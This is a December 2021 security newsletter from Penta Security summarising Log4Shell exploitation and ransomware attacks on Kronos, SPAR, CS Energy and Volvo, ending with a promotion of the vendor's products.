[Security Weekly] Apache Log4j Vulnerability Exploited By All Hackers Worldwide
December 2021, Issue II
1. Apache Log4j flaw exploited by all hackers worldwide, over 20,000 attempts per minute
“Worst vulnerability of the decade”, as characterized by many cybersecurity experts, the Apache Log4j vulnerability, also known as Log4Shell, LogJam, or CVE-2021-44228, is now exploited by state-backed threat actors and ransomware gangs all across the globe.
Java-based Apache Log4j is one of the most commonly used logging libraries online, used by software developers to record activities and retrieve them for a variety of purposes. First disclosed on December 9, Log4Shell has the potential to impact virtually all applications in the world due to its widespread use. Experts now worry that worms could be created for fast-spreading automated attacks.
The flaw allows hackers to launch remote code execution (RCE) by inserting an LDAP URL that links to their own directory server, triggering the targeted Java program to retrieve the data (malicious code) from their directory. Cloudflare reported an average of 27,439 requests per minute on December 12.
Fortunately, WAPPLES customers are safe from exploitation thanks to its logical detection rules. Nonetheless, all Log4j users are advised to update to version 2.15.0 immediately.
2. Ransomware attack on Kronos HR management platform delays payrolls
Kronos, an HR management platform used by many large corporations, governments, and universities, suffered a severe ransomware attack that took its cloud-based services offline for several weeks to come.
Kronos’ parent company UKG said that ransomware intrusion was first discovered on December 11, followed by the compromise of Kronos Private Cloud. The cloud servers host several critical HR management services including UKG Workforce Central, UKG TeleStaff, Healthcare Extensions, and Bank Scheduling Solutions.
UKG notified the affected client firms that the services may not resume for several weeks, and asked them to look for contingency plans on payroll and urgent HR tasks. It also warned that their employee information, including names, addresses, and social security numbers (SSN), may have been compromised by the attackers.
The attack took place at an especially concerning time given that it is only a week ahead of Christmas. Many affected companies informed their employees that their payroll would be delayed for the week. A halt to the vacation tracking and management tools poses another challenge for HR as employees take their holiday leaves.
3. SPAR supermarket chain experience store closures following cyberattack
SPAR, a Dutch retail chain with over 13,000 independently owned supermarkets and convenience stores across 48 countries, suffered a cyberattack that caused an IT outage affecting 330 stores in the northern part of England.
Disruptions were first experienced on December 5 and continued throughout that week. Hundreds of affected stores were unable to process card transactions. Employees were unable to access accounting and inventory management systems, forcing many stores to close for an indefinite period of time.
A spokesperson from SPAR said that some store closures were caused by a cyberattack at James Hall & Co Ltd., a regional supplier of SPAR. However, it was not specified whether these were two separate attacks or a supply chain attack.
4. Queensland energy generator hit by state-backed ransomware attack
CS Energy, a government-owned energy-generation firm in Queensland, Australia, suffered a ransomware attack in late November which was later reported to be initiated by Chinese state hackers. The attack came close to knocking out power supply for up to three million homes.
The hackers intruded CS Energy’s corporate network in an attempt to move into the OT system of its two coal-fired power plants: Kogan Creek Power Station and Callide B Power Station. These stations combined circulate 3,500 megawatts of electricity into the grid, enough to power up to three million homes.
Fortunately, IT staff at the company immediately segregated the OT network from the corporate IT network, preventing the ransomware from infecting the power plants at the last minute. Nevertheless, the IT systems were impacted, leaving employees unable to access their emails and internal data.
In the past year, cyberattacks on critical infrastructure like pipelines, gas stations, and power plants have become increasingly common. Governments and infrastructure operators must stay prepared to protect their IT and OT systems.
5. Volvo Cars’ R&D data stolen by Snatch ransomware gang
Volvo Cars disclosed a cyberattack incident that led to a data breach involving its sensitive files, including R&D secrets. Volvo stated that it had hired third-party cybersecurity experts to investigate the incident and reassured its customers that their personal and vehicle data remain untouched, based on available information.
Even though the company did not specify the type of attack, the Snatch ransomware gang claimed responsibility on its leak site on November 30. It went on to publish 35.9 MB of samples from the data they stole, and posted screenshots of the compromised files to prove its claim.
The Snatch ransomware gang is known for its unique tactic of forcing PCs to reboot into Safe Mode to bypass endpoint protection.
Check out Penta Security’s product lines:
Web Application Firewall: WAPPLES
Database Encryption: D’Amo
Identity and Access Management: iSIGN+
Car, Energy, Factory, City Solutions: Penta IoT Security